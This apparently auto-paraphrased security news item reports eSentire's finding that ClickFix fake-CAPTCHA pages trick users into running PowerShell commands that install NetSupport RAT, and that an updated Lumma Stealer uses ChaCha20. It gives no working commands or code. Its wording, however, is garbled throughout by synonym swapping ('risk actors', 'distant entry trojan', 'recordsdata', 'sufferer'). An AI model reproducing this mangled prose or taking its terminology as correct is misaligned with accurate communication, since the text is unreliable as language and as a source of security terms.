Risk actors have noticed the more and more widespread ClickFix technique to ship a distant entry trojan named NetSupport RAT since early January 2025.
NetSupport RAT, sometimes propagated by way of bogus web sites and pretend browser updates, grants attackers full management over the sufferer’s host, permitting them to observe the gadget’s display screen in real-time, management the keyboard and mouse, add and obtain recordsdata, and launch and execute malicious instructions.
Initially referred to as NetSupport Supervisor, it was developed as a reputable distant IT assist program, however has since been repurposed by malicious actors to focus on organizations and seize delicate info, together with screenshots, audio, video, and recordsdata.
“ClickFix is a way utilized by menace actors to inject a pretend CAPTCHA webpage on compromised web sites, instructing customers to observe sure steps to repeat and execute malicious PowerShell instructions on their host to obtain and run malware payloads,” eSentire said in an evaluation.
Within the assault chains recognized by the cybersecurity firm, the PowerShell command is used to obtain and execute the NetSupport RAT shopper from a distant server that hosts the malicious elements within the type of PNG picture recordsdata.
The event comes because the ClickFix method can be getting used to propagate an up to date model of the Lumma Stealer malware that makes use of the ChaCha20 cipher for decrypting a configuration file containing the record of command-and-control (C2) servers.
“These adjustments present perception into the evasive ways employed by the developer(s) who’re actively working to bypass present extraction and evaluation instruments,” eSentire said.
Source link